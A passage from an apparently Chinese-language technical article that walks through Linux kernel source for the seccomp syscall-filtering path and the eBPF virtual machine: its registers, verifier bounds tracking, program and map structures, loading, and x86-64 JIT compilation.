fput(listener_f); /* drop the reference to the listener file */
put_unused_fd(listener); /* give back the reserved fd number */
seccomp_notify_detach(prepared);
} else {
fd_install(listener, listener_f);
ret = listener;
}
}
out_free:
seccomp_filter_free(prepared);
return ret;
}
  • 其最核心的工作就是在 current->seccomp.filter 中注册过滤器:
1
2
3
filter->prev = current->seccomp.filter;
current->seccomp.filter = filter;
atomic_inc(&current->seccomp.filter_count);

如果使用了 FILTER 模式,则调用 seccomp_run_filters 函数来进行所有指令判断过滤,系统调用号作为参数传递,根据返回值来进行后续处理

这里我们分析一下从 syscall 入口函数 entry_SYSCALL_compat 到 seccomp_run_filters 的调用链:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/*
 * Compat SYSCALL entry point (excerpt; "......" marks code the article left
 * out). Shown here as the first link of the call chain that leads to
 * do_fast_syscall_32.
 */
SYM_CODE_START(entry_SYSCALL_compat)
UNWIND_HINT_EMPTY
/* Interrupts are off on entry. */
swapgs

/* Stash user ESP */
movl %esp, %r8d

/* Use %rsp as scratch reg. User ESP is stashed in r8 */
SWITCH_TO_KERNEL_CR3 scratch_reg=%rsp
......
/* %rsp is passed as the first argument to the C handler. */
movq %rsp, %rdi
call do_fast_syscall_32
......
SWITCH_TO_USER_CR3_NOSTACK scratch_reg=%r8 scratch_reg2=%r9

/* Zero r8-r10 before going back to user mode. */
xorl %r8d, %r8d
xorl %r9d, %r9d
xorl %r10d, %r10d
swapgs
sysretl
SYM_CODE_END(entry_SYSCALL_compat)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/*
 * C-level handling of a fast 32-bit syscall (excerpt; "......" marks code the
 * article left out). The syscall number is passed through
 * syscall_enter_from_user_mode_work() before being dispatched. The visible
 * path returns true.
 */
static noinstr bool __do_fast_syscall_32(struct pt_regs *regs)
{
unsigned int nr = syscall_32_enter(regs);
int res;

......

/* The case truncates any ptrace induced syscall nr > 2^32 -1 */
nr = (unsigned int)syscall_enter_from_user_mode_work(regs, nr);

/* Now this is just like a normal syscall. */
do_syscall_32_irqs_on(regs, nr);
syscall_exit_to_user_mode(regs);
return true;
}
1
2
3
4
/* Thin wrapper: forwards to __syscall_enter_from_user_work() and returns its result. */
long syscall_enter_from_user_mode_work(struct pt_regs *regs, long syscall)
{
return __syscall_enter_from_user_work(regs, syscall);
}
1
2
3
4
5
6
7
8
9
10
11
/*
 * Run syscall-entry work if any is pending for the current thread.
 * Returns the syscall number unchanged when no SYSCALL_ENTER_WORK bit is set
 * in the thread-info flags; otherwise returns what syscall_trace_enter()
 * decides.
 */
static __always_inline long
__syscall_enter_from_user_work(struct pt_regs *regs, long syscall)
{
unsigned long ti_work;

ti_work = READ_ONCE(current_thread_info()->flags);
if (ti_work & SYSCALL_ENTER_WORK)
syscall = syscall_trace_enter(regs, syscall, ti_work);

return syscall;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/*
 * Slow-path syscall entry work (excerpt; "......" marks code the article left
 * out). When _TIF_SECCOMP is set the seccomp check runs; a result of -1 is
 * returned to the caller immediately. In the visible code the function
 * otherwise returns ret if it is non-zero, else the original syscall number.
 */
static long syscall_trace_enter(struct pt_regs *regs, long syscall,
unsigned long ti_work)
{
long ret = 0;

......

if (ti_work & _TIF_SECCOMP) {
ret = __secure_computing(NULL);
if (ret == -1L)
return ret;
}

......

return ret ? : syscall;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/*
 * Seccomp entry check, dispatched on current->seccomp.mode.
 * @sd: optional pre-filled syscall data; when NULL the syscall number is
 *      taken from the current task's registers.
 *
 * Returns 0 when checkpoint/restore has suspended seccomp for a ptraced task
 * and after the strict-mode check; in filter mode returns the result of
 * __seccomp_filter(). Any other mode hits BUG().
 */
int __secure_computing(const struct seccomp_data *sd)
{
int mode = current->seccomp.mode;
int this_syscall;

if (IS_ENABLED(CONFIG_CHECKPOINT_RESTORE) &&
unlikely(current->ptrace & PT_SUSPEND_SECCOMP))
return 0;

this_syscall =
sd ? sd->nr : syscall_get_nr(current, task_pt_regs(current));

switch (mode) {
case SECCOMP_MODE_STRICT:
__secure_computing_strict(this_syscall); /* may call do_exit */
return 0;
case SECCOMP_MODE_FILTER:
return __seccomp_filter(this_syscall, sd, false);
default:
BUG();
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
/*
 * Filter-mode seccomp check (excerpt; "......" marks the action handling the
 * article left out). Fills in the syscall data locally when the caller did
 * not supply it, then runs the task's filters. The visible "skip" path logs
 * the decision and returns -1.
 */
static int __seccomp_filter(int this_syscall, const struct seccomp_data *sd,
const bool recheck_after_trace)
{
u32 filter_ret, action;
struct seccomp_filter *match = NULL;
int data;
struct seccomp_data sd_local;

rmb();

/* No data from the caller: populate a local copy and use that. */
if (!sd) {
populate_seccomp_data(&sd_local);
sd = &sd_local;
}

filter_ret = seccomp_run_filters(sd, &match);

......

skip:
seccomp_log(this_syscall, 0, action, match ? match->log : false);
return -1;
}

指令过滤函数 seccomp_run_filters 的源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
/*
 * Run every filter attached to the current task against @sd.
 * @sd:    syscall data handed to each filter program
 * @match: set to the filter whose result was selected; left untouched if no
 *         filter returns an action lower than SECCOMP_RET_ALLOW
 *
 * Returns the filter result with the lowest action value, starting from
 * SECCOMP_RET_ALLOW, or SECCOMP_RET_KILL_PROCESS if the task unexpectedly
 * has no filter.
 */
static u32 seccomp_run_filters(const struct seccomp_data *sd,
struct seccomp_filter **match)
{
u32 ret = SECCOMP_RET_ALLOW;
/* Make sure cross-thread synced filter points somewhere sane. */
struct seccomp_filter *f = READ_ONCE(current->seccomp.filter);

/* Ensure unexpected behavior doesn't result in failing open. */
if (WARN_ON(f == NULL))
return SECCOMP_RET_KILL_PROCESS;

/*
* All filters in the list are evaluated and the lowest BPF return
* value always takes priority (ignoring the DATA).
*/
for (; f; f = f->prev) {
u32 cur_ret = bpf_prog_run_pin_on_cpu(f->prog, sd); /* run this filter's BPF program */

if (ACTION_ONLY(cur_ret) < ACTION_ONLY(ret)) {
ret = cur_ret;
*match = f;
}
}
return ret;
}
  • bpf_prog_run_pin_on_cpu 是一个用于运行 BPF 程序的函数:它先调用 migrate_disable() 禁止当前任务被迁移到其他 CPU,然后运行 BPF 程序,最后调用 migrate_enable() 重新允许迁移,从而保证程序运行期间始终处于同一个 CPU 上
1
2
3
4
5
6
7
8
9
10
/*
 * Run a BPF program with task migration disabled for the duration of the run.
 * Returns the program's 32-bit result.
 */
static inline u32 bpf_prog_run_pin_on_cpu(const struct bpf_prog *prog,
const void *ctx)
{
u32 ret;

migrate_disable(); /* disable migration of the current task */
ret = __BPF_PROG_RUN(prog, ctx, bpf_dispatcher_nop_func); /* run the BPF program */
migrate_enable(); /* re-enable migration */
return ret;
}

eBPF 虚拟机

Linux 下 eBPF 的整体架构如下图所示:

  • 传入:用户进程首先在用户空间编写相应的 BPF 字节码程序,传入内核
  • 检查:内核通过 verifier 对字节码程序进行安全性检查
  • 编译 or 解释:通过检查后便通过 JIT 编译运行,或者直接解释运行 BPF 字节码
  • 映射:用以保存数据的通用结构,可以在不同的 eBPF 程序之间或是用户进程与内核间共享数据(不同的 eBPF 程序之间可以共享同一个映射)

eBPF 底层是一个使用 RISC 指令集的虚拟机,使用11个64位寄存器和一个固定大小为512字节的栈:

  • 其中10个寄存器(R0 ~ R9)是通用寄存器
  • 一个只读栈帧寄存器

寄存器总是64位大小,在32位机器上会默认把前32位置零,这也为 eBPF 提供了交叉编译的兼容性,各个寄存器的功能如下:

  • R0: RAX,存放函数返回值或程序退出状态码
  • R1: RDI,第一个实参
  • R2: RSI,第二个实参
  • R3: RDX,第三个实参
  • R4: RCX,第四个实参
  • R5: R8,第五个实参
  • R6: RBX,callee saved
  • R7: R13,callee saved
  • R8: R14,callee saved
  • R9: R15,callee saved
  • R10: RBP,只读栈帧

在 eBPF 中,一个寄存器的状态信息使用 bpf_reg_state 进行表示:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
/*
 * Verifier-side description of one eBPF register: its type, the pointer
 * offset bookkeeping, and the value bounds (tnum plus signed/unsigned
 * 64-bit and 32-bit min/max) tracked while the program is checked.
 */
struct bpf_reg_state {
/* Ordering of fields matters. See states_equal() */
enum bpf_reg_type type; /* register type */
/* Fixed part of pointer offset, pointer types only */
s32 off;
union {
/* valid when type == PTR_TO_PACKET */
int range;

/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
* PTR_TO_MAP_VALUE_OR_NULL
*/
struct bpf_map *map_ptr;

/* for PTR_TO_BTF_ID */
struct {
struct btf *btf;
u32 btf_id;
};

u32 mem_size; /* for PTR_TO_MEM | PTR_TO_MEM_OR_NULL */

/* Max size from any of the above. */
struct {
unsigned long raw1;
unsigned long raw2;
} raw;
};
/* For PTR_TO_PACKET, used to find other pointers with the same variable
* offset, so they can share range knowledge.
* For PTR_TO_MAP_VALUE_OR_NULL this is used to share which map value we
* came from, when one is tested for != NULL.
* For PTR_TO_MEM_OR_NULL this is used to identify memory allocation
* for the purpose of tracking that it's freed.
* For PTR_TO_SOCKET this is used to share which pointers retain the
* same reference to the socket, to determine proper reference freeing.
*/
u32 id;
/* PTR_TO_SOCKET and PTR_TO_TCP_SOCK could be a ptr returned
* from a pointer-cast helper, bpf_sk_fullsock() and
* bpf_tcp_sock().
*
* Consider the following where "sk" is a reference counted
* pointer returned from "sk = bpf_sk_lookup_tcp();":
*
* 1: sk = bpf_sk_lookup_tcp();
* 2: if (!sk) { return 0; }
* 3: fullsock = bpf_sk_fullsock(sk);
* 4: if (!fullsock) { bpf_sk_release(sk); return 0; }
* 5: tp = bpf_tcp_sock(fullsock);
* 6: if (!tp) { bpf_sk_release(sk); return 0; }
* 7: bpf_sk_release(sk);
* 8: snd_cwnd = tp->snd_cwnd; // verifier will complain
*
* After bpf_sk_release(sk) at line 7, both "fullsock" ptr and
* "tp" ptr should be invalidated also. In order to do that,
* the reg holding "fullsock" and "sk" need to remember
* the original refcounted ptr id (i.e. sk_reg->id) in ref_obj_id
* such that the verifier can reset all regs which have
* ref_obj_id matching the sk_reg->id.
*
* sk_reg->ref_obj_id is set to sk_reg->id at line 1.
* sk_reg->id will stay as NULL-marking purpose only.
* After NULL-marking is done, sk_reg->id can be reset to 0.
*
* After "fullsock = bpf_sk_fullsock(sk);" at line 3,
* fullsock_reg->ref_obj_id is set to sk_reg->ref_obj_id.
*
* After "tp = bpf_tcp_sock(fullsock);" at line 5,
* tp_reg->ref_obj_id is set to fullsock_reg->ref_obj_id
* which is the same as sk_reg->ref_obj_id.
*
* From the verifier perspective, if sk, fullsock and tp
* are not NULL, they are the same ptr with different
* reg->type. In particular, bpf_sk_release(tp) is also
* allowed and has the same effect as bpf_sk_release(sk).
*/
u32 ref_obj_id;
/* For scalar types (SCALAR_VALUE), this represents our knowledge of
* the actual value.
* For pointer types, this represents the variable part of the offset
* from the pointed-to object, and is shared with all bpf_reg_states
* with the same id as us.
*/
struct tnum var_off;
/* Used to determine if any memory access using this register will
* result in a bad access.
* These refer to the same value as var_off, not necessarily the actual
* contents of the register.
*/
s64 smin_value; /* minimum possible (s64)value */
s64 smax_value; /* maximum possible (s64)value */
u64 umin_value; /* minimum possible (u64)value */
u64 umax_value; /* maximum possible (u64)value */
s32 s32_min_value; /* minimum possible (s32)value */
s32 s32_max_value; /* maximum possible (s32)value */
u32 u32_min_value; /* minimum possible (u32)value */
u32 u32_max_value; /* maximum possible (u32)value */
/* parentage chain for liveness checking */
struct bpf_reg_state *parent;
/* Inside the callee two registers can be both PTR_TO_STACK like
* R1=fp-8 and R2=fp-8, but one of them points to this function stack
* while another to the caller's stack. To differentiate them 'frameno'
* is used which is an index in bpf_verifier_state->frame[] array
* pointing to bpf_func_state.
*/
u32 frameno;
/* Tracks subreg definition. The stored value is the insn_idx of the
* writing insn. This is safe because subreg_def is used before any insn
* patching which only happens after main verification finished.
*/
s32 subreg_def;
enum bpf_reg_liveness live;
/* if (!precise && SCALAR_VALUE) min/max/tnum don't affect safety */
bool precise;
};

当 eBPF 字节码载入到内核中后,verifier 会对 eBPF 字节码进行一系列的检查,主要关注以下几个字段:

  • smin_value、smax_value:64 位有符号的值的可能取值边界
  • umin_value、umax_value:64 位无符号的值的可能取值边界
  • s32_min_value、s32_max_value:32 位有符号的值的可能取值边界
  • u32_min_value、u32_max_value:32 位无符号的值的可能取值边界

核心检查函数就是 bpf_check,一个静态代码分析器:

  • 逐条遍历 eBPF 程序中的指令并更新寄存器 / 堆栈的状态,条件分支的所有路径都会被分析,直到 bpf_exit 指令
  • 这其实是一个模拟执行的过程,verifier 会推测寄存器的边界值,检查其是否符合规则
  • 模拟通过后才能正常加载 eBPF 程序

在其中用于检测指令合法性的函数为 do_check,该函数会遍历每一条指令并根据指令的不同类型进行不同操作,对于算术指令(BPF_ALU / BPF_ALU64)而言有如下调用链

1
2
3
4
do_check()        					// 遍历每一条指令并根据类型调用相应函数处理
->check_alu_op() // 根据算术指令的opcode进行不同处理
->adjust_reg_min_max_vals() // 计算新的寄存器边界值
->adjust_scalar_min_max_vals() // 根据opcode计算具体的新边界值

当 eBPF 字节码载入到内核中后,内核最终会使用一个 bpf_prog 结构体来表示一个 eBPF 程序:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/*
 * Kernel representation of one loaded BPF program: bookkeeping flags,
 * program/attach type, instruction counts, the entry point bpf_func and the
 * instruction array stored at the end of the structure.
 */
struct bpf_prog {
u16 pages; /* Number of allocated pages */
u16 jited:1, /* Is our filter JIT'ed? */
jit_requested:1,/* archs need to JIT the prog */
gpl_compatible:1, /* Is filter GPL compatible? */
cb_access:1, /* Is control block accessed? */
dst_needed:1, /* Do we need dst entry? */
blinded:1, /* Was blinded */
is_func:1, /* program is a bpf function */
kprobe_override:1, /* Do we override a kprobe? */
has_callchain_buf:1, /* callchain buffer allocated? */
enforce_expected_attach_type:1, /* Enforce expected_attach_type checking at attach time */
call_get_stack:1; /* Do we call bpf_get_stack() or bpf_get_stackid() */
enum bpf_prog_type type; /* Type of BPF program */
enum bpf_attach_type expected_attach_type; /* For some prog types */
u32 len; /* Number of filter blocks */
u32 jited_len; /* Size of jited insns in bytes */
u8 tag[BPF_TAG_SIZE];
struct bpf_prog_aux *aux; /* Auxiliary fields */
struct sock_fprog_kern *orig_prog; /* Original BPF program */
/* Entry point called to run the program. */
unsigned int (*bpf_func)(const void *ctx,
const struct bpf_insn *insn);
/* Instructions for interpreter */
struct sock_filter insns[0];
struct bpf_insn insnsi[];
};

接着就是编译,解释 eBPF 字节码,生成 bpf map 并记录在 bpf_reg_state->map_ptr

bpf map 是一个通用的用以储存不同种类数据的结构,用以在用户进程与 eBPF 程序、eBPF 程序与 eBPF 程序之间进行数据共享(这些数据以二进制形式储存,因此用户在创建时只需要指定 key 与 value 的 size)

核心结构体 bpf_map 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
/*
 * Common header shared by every BPF map: the operations table, the
 * user-visible attributes (type, key/value sizes, capacity, flags) and the
 * reference-counting / lifetime fields.
 */
struct bpf_map {
/* The first two cachelines with read-mostly members of which some
* are also accessed in fast-path (e.g. ops, max_entries).
*/
const struct bpf_map_ops *ops ____cacheline_aligned;
struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
void *security;
#endif
enum bpf_map_type map_type; /* data-structure type of the map */
u32 key_size; /* size in bytes of the key used to index an element */
u32 value_size; /* size in bytes of each element */
u32 max_entries; /* maximum number of entries in the map */
u32 map_flags; /* map-specific properties (e.g. whether all memory is preallocated) */
int spin_lock_off; /* >=0 valid offset, <0 error */
u32 id;
int numa_node;
u32 btf_key_type_id;
u32 btf_value_type_id;
struct btf *btf;
#ifdef CONFIG_MEMCG_KMEM
struct mem_cgroup *memcg;
#endif
char name[BPF_OBJ_NAME_LEN];
u32 btf_vmlinux_value_type_id;
bool bypass_spec_v1;
bool frozen; /* write-once; write-protected by freeze_mutex */
/* 22 bytes hole */

/* The 3rd and 4th cacheline with misc members to avoid false sharing
* particularly with refcounting.
*/
atomic64_t refcnt ____cacheline_aligned;
atomic64_t usercnt;
struct work_struct work;
struct mutex freeze_mutex;
u64 writecnt; /* writable mmap cnt; protected by freeze_mutex */
};

bpf map 有多种类型,记录于 bpf_map_type 枚举中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
/*
 * Map types selectable when creating a BPF map. Values are implicit and
 * count up from 0, so BPF_MAP_TYPE_ARRAY is 2 and BPF_MAP_TYPE_STACK is 23.
 */
enum bpf_map_type {
BPF_MAP_TYPE_UNSPEC,
BPF_MAP_TYPE_HASH, /* key/value pairs stored in a hash table (the most common type) */
BPF_MAP_TYPE_ARRAY, /* key/value pairs stored as an array: the key is the index, values start out zeroed */
BPF_MAP_TYPE_PROG_ARRAY, /* special array map whose values are file descriptors of other eBPF programs */
BPF_MAP_TYPE_PERF_EVENT_ARRAY,
BPF_MAP_TYPE_PERCPU_HASH,
BPF_MAP_TYPE_PERCPU_ARRAY,
BPF_MAP_TYPE_STACK_TRACE,
BPF_MAP_TYPE_CGROUP_ARRAY,
BPF_MAP_TYPE_LRU_HASH,
BPF_MAP_TYPE_LRU_PERCPU_HASH,
BPF_MAP_TYPE_LPM_TRIE,
BPF_MAP_TYPE_ARRAY_OF_MAPS,
BPF_MAP_TYPE_HASH_OF_MAPS,
BPF_MAP_TYPE_DEVMAP,
BPF_MAP_TYPE_SOCKMAP,
BPF_MAP_TYPE_CPUMAP,
BPF_MAP_TYPE_XSKMAP,
BPF_MAP_TYPE_SOCKHASH,
BPF_MAP_TYPE_CGROUP_STORAGE,
BPF_MAP_TYPE_REUSEPORT_SOCKARRAY,
BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE,
BPF_MAP_TYPE_QUEUE,
BPF_MAP_TYPE_STACK, /* data stored as a stack */
BPF_MAP_TYPE_SK_STORAGE,
BPF_MAP_TYPE_DEVMAP_HASH,
BPF_MAP_TYPE_STRUCT_OPS,
BPF_MAP_TYPE_RINGBUF,
BPF_MAP_TYPE_INODE_STORAGE,
BPF_MAP_TYPE_TASK_STORAGE,
};

Seccomp BPF

柏克莱封包过滤器(Berkeley Packet Filter,缩写 BPF),是类 Unix 系统上数据链路层的一种原始接口,提供原始链路层封包的收发,除此之外,如果网卡驱动支持混杂模式(promiscuous mode),那么它可以让网卡处于此种模式,这样可以收到网络上的所有包,不管它们的目的地是不是所在主机

Seccomp BPF 是一种基于 Linux 内核的 BPF 过滤器,用于对 Linux 进程的系统调用进行过滤和拦截(eBPF 的一部分)

BPF 的指令集比较简单,开发人员定义了符号常量和两个方便的宏 BPF_STMT 和 BPF_JUMP,可以用来方便地编写 BPF 规则

1
BPF_STMT(BPF_LD | BPF_W | BPF_ABS,(offsetof(struct seccomp_data, arch)))
  • BPF_LD:建一个 BPF 加载操作
  • BPF_W:操作数大小是一个字
  • BPF_ABS:使用绝对偏移,即使用指令中的值作为数据区的偏移量,该值是体系结构字段与数据区域的偏移量
  • offsetof():生成数据区域中期望字段的偏移量
1
BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K ,AUDIT_ARCH_X86_64 , 1, 0)
  • BPF_JMP | BPF_JEQ 会创建一个相等跳转指令,BPF_K 表示比较对象是指令中的立即数:它将累加器中的值与指令中的值(即第二个参数)进行比较,判断是否相等
    • 如果架构是则跳过下一条指令(jt=1,代表测试为真,跳过一条指令)
    • 否则将执行下一条指令(jf=0,代表测试为假,继续执行下一条指令)

用户编写的 eBPF 程序最终会被编译成 eBPF 字节码,eBPF 字节码使用 bpf_insn 结构来表示,如下:

1
2
3
4
5
6
7
/* One eBPF instruction (8 bytes in total). */
struct bpf_insn {
__u8 code; /* opcode */
__u8 dst_reg:4; /* destination register */
__u8 src_reg:4; /* source register */
__s16 off; /* signed offset */
__s32 imm; /* signed immediate constant */
};

eBPF 程序会被 LLVM/Clang 编译成 bpf_insn 结构数组,这里使用了 JIT 即时编译技术(PS:当 eBPF 字节码被加载到内核时,内核会根据是否开启了 JIT 功能选项,来决定是否将 eBPF 字节码编译成机器码)

内核通过 bpf_prog_load 函数来加载 eBPF 字节码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
/*
 * Load an eBPF program described by @attr (excerpt; "......" marks code the
 * article left out).
 *
 * Visible steps: allocate the bpf_prog, run the verifier, select the runtime
 * (JIT or interpreter), allocate an id, publish the program and create a
 * file descriptor for it.
 *
 * Returns the result of bpf_prog_new_fd() on success, or a negative errno.
 * The jumps to the free_prog* labels are in the elided part.
 */
static int bpf_prog_load(union bpf_attr *attr, union bpf_attr __user *uattr)
{
enum bpf_prog_type type = attr->prog_type;
struct bpf_prog *prog; /* holds the state of the eBPF program being loaded */
int err;
char license[128];
bool is_gpl;

......

/* plain bpf_prog allocation */
prog = bpf_prog_alloc(bpf_prog_size(attr->insn_cnt), GFP_USER); /* allocate the bpf_prog structure */
if (!prog)
return -ENOMEM;

......

/* run eBPF verifier */
err = bpf_check(&prog, attr, uattr);
if (err < 0)
goto free_used_maps;

prog = bpf_prog_select_runtime(prog, &err); /* choose the runtime, JIT-compiling when possible */
if (err < 0)
goto free_used_maps;

err = bpf_prog_alloc_id(prog);
if (err)
goto free_used_maps;

bpf_prog_kallsyms_add(prog);
perf_event_bpf_event(prog, PERF_BPF_EVENT_PROG_LOAD, 0);
bpf_audit_prog(prog, BPF_AUDIT_LOAD);

err = bpf_prog_new_fd(prog);
if (err < 0)
bpf_prog_put(prog);
return err;

free_used_maps:
/* In case we have subprogs, we need to wait for a grace
* period before we can tear down JIT memory since symbols
* are already exposed under kallsyms.
*/
__bpf_prog_put_noref(prog, prog->aux->func_cnt);
return err;
free_prog:
bpf_prog_uncharge_memlock(prog);
free_prog_sec:
security_bpf_prog_free(prog->aux);
free_prog_nouncharge:
bpf_prog_free(prog);
return err;
}
  • 函数 bpf_prog_load 会调用 bpf_prog_select_runtime 函数来判断是否使用 JIT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
/*
 * Decide how @fp will be executed and finalize it.
 * @fp:  program to finalize
 * @err: receives an error code on the failure paths and the result of
 *       bpf_check_tail_call() on the normal path
 *
 * If fp->bpf_func is already set, only the finalize step runs. Otherwise a
 * function is selected first; then programs that are not device-bound go
 * through the JIT, and device-bound programs go through the offload compiler.
 * With CONFIG_BPF_JIT_ALWAYS_ON, a program that did not get JITed is
 * rejected with -ENOTSUPP.
 *
 * Returns the (possibly replaced) program pointer.
 */
struct bpf_prog *bpf_prog_select_runtime(struct bpf_prog *fp, int *err)
{
if (fp->bpf_func)
goto finalize;

bpf_prog_select_func(fp);

if (!bpf_prog_is_dev_bound(fp->aux)) {
*err = bpf_prog_alloc_jited_linfo(fp);
if (*err)
return fp;

fp = bpf_int_jit_compile(fp); /* try to compile the eBPF bytecode to machine code */
if (!fp->jited) {
bpf_prog_free_jited_linfo(fp);
#ifdef CONFIG_BPF_JIT_ALWAYS_ON
*err = -ENOTSUPP;
return fp;
#endif
} else {
bpf_prog_free_unused_jited_linfo(fp);
}
} else {
*err = bpf_prog_offload_compile(fp);
if (*err)
return fp;
}

finalize:
bpf_prog_lock_ro(fp);

*err = bpf_check_tail_call(fp);

return fp;
}
EXPORT_SYMBOL_GPL(bpf_prog_select_runtime);
  • 对于不同的架构,函数 bpf_int_jit_compile 有不同的实现
  • 这里我们只分析 x86_64 架构下的 bpf_int_jit_compile
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
/*
 * x86-64 JIT entry point: translate @prog into native code.
 *
 * Returns the program to use afterwards. That is the original program,
 * unchanged, whenever JIT was not requested or any step fails; otherwise it
 * is the (possibly blinded) program with bpf_func pointing at the generated
 * image and jited set to 1.
 */
struct bpf_prog *bpf_int_jit_compile(struct bpf_prog *prog)
{
struct bpf_binary_header *header = NULL;
struct bpf_prog *tmp, *orig_prog = prog;
struct x64_jit_data *jit_data;
int proglen, oldproglen = 0;
struct jit_context ctx = {};
bool tmp_blinded = false;
bool extra_pass = false;
u8 *image = NULL;
int *addrs;
int pass;
int i;

if (!prog->jit_requested) /* JIT was not requested for this program: return it untouched */
return orig_prog;

tmp = bpf_jit_blind_constants(prog);
/*
* If blinding was requested and we failed during blinding,
* we must fall back to the interpreter.
*/
if (IS_ERR(tmp))
return orig_prog;
if (tmp != prog) {
tmp_blinded = true;
prog = tmp;
}

jit_data = prog->aux->jit_data;
if (!jit_data) {
jit_data = kzalloc(sizeof(*jit_data), GFP_KERNEL);
if (!jit_data) {
prog = orig_prog;
goto out;
}
prog->aux->jit_data = jit_data;
}
addrs = jit_data->addrs;
/* Saved state from an earlier call: restore it and go straight to the extra pass. */
if (addrs) {
ctx = jit_data->ctx;
oldproglen = jit_data->proglen;
image = jit_data->image;
header = jit_data->header;
extra_pass = true;
goto skip_init_addrs;
}
addrs = kmalloc_array(prog->len + 1, sizeof(*addrs), GFP_KERNEL);
if (!addrs) {
prog = orig_prog;
goto out_addrs;
}

/*
* Before first pass, make a rough estimation of addrs[]
* each BPF instruction is translated to less than 64 bytes
*/
for (proglen = 0, i = 0; i <= prog->len; i++) {
proglen += 64;
addrs[i] = proglen;
}
ctx.cleanup_addr = proglen;
skip_init_addrs:

/*
* JITed image shrinks with every pass and the loop iterates
* until the image stops shrinking. Very large BPF programs
* may converge on the last pass. In such case do one more
* pass to emit the final image.
*/
for (pass = 0; pass < 20 || image; pass++) {
proglen = do_jit(prog, addrs, image, oldproglen, &ctx); /* translate the eBPF bytecode to native machine code */
if (proglen <= 0) {
out_image:
image = NULL;
if (header)
bpf_jit_binary_free(header);
prog = orig_prog;
goto out_addrs;
}
if (image) {
if (proglen != oldproglen) {
pr_err("bpf_jit: proglen=%d != oldproglen=%d\n",
proglen, oldproglen);
goto out_image;
}
break;
}
/* Size unchanged since the previous pass: allocate the image for the final emit. */
if (proglen == oldproglen) {
u32 align = __alignof__(struct exception_table_entry);
u32 extable_size = prog->aux->num_exentries *
sizeof(struct exception_table_entry);

/* allocate module memory for x86 insns and extable */
header = bpf_jit_binary_alloc(roundup(proglen, align) + extable_size,
&image, align, jit_fill_hole);
if (!header) {
prog = orig_prog;
goto out_addrs;
}
prog->aux->extable = (void *) image + roundup(proglen, align);
}
oldproglen = proglen;
cond_resched();
}

if (bpf_jit_enable > 1)
bpf_jit_dump(prog->len, proglen, pass + 1, image); /* dump the generated machine code */

if (image) {
if (!prog->is_func || extra_pass) {
bpf_tail_call_direct_fixup(prog);
bpf_jit_binary_lock_ro(header);
} else {
/* Keep the JIT state so a later call can run the extra pass. */
jit_data->addrs = addrs;
jit_data->ctx = ctx;
jit_data->proglen = proglen;
jit_data->image = image;
jit_data->header = header;
}
prog->bpf_func = (void *)image; /* point the program's entry at the generated machine code */
prog->jited = 1;
prog->jited_len = proglen;
} else {
prog = orig_prog;
}

if (!image || !prog->is_func || extra_pass) {
if (image)
bpf_prog_fill_jited_linfo(prog, addrs + 1);
out_addrs:
kfree(addrs);
kfree(jit_data);
prog->aux->jit_data = NULL;
}
out:
/* Release whichever of the blinded/original pair is not being returned. */
if (tmp_blinded)
bpf_jit_prog_release_other(prog, prog == orig_prog ?
tmp : orig_prog);
return prog;
}

当函数 do_jit 将 eBPF 字节码编译为本地机器码后,prog->bpf_func 便指向这段机器码,之后可以直接调用 prog->bpf_func 来执行

当程序没有经过 JIT 编译、需要由内核解释执行 eBPF 字节码时,prog->bpf_func 指向的是解释器入口 __bpf_prog_runN(按不同 stack size 生成的一组包装函数),它们最终都会调用解释器的核心函数 ___bpf_prog_run:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
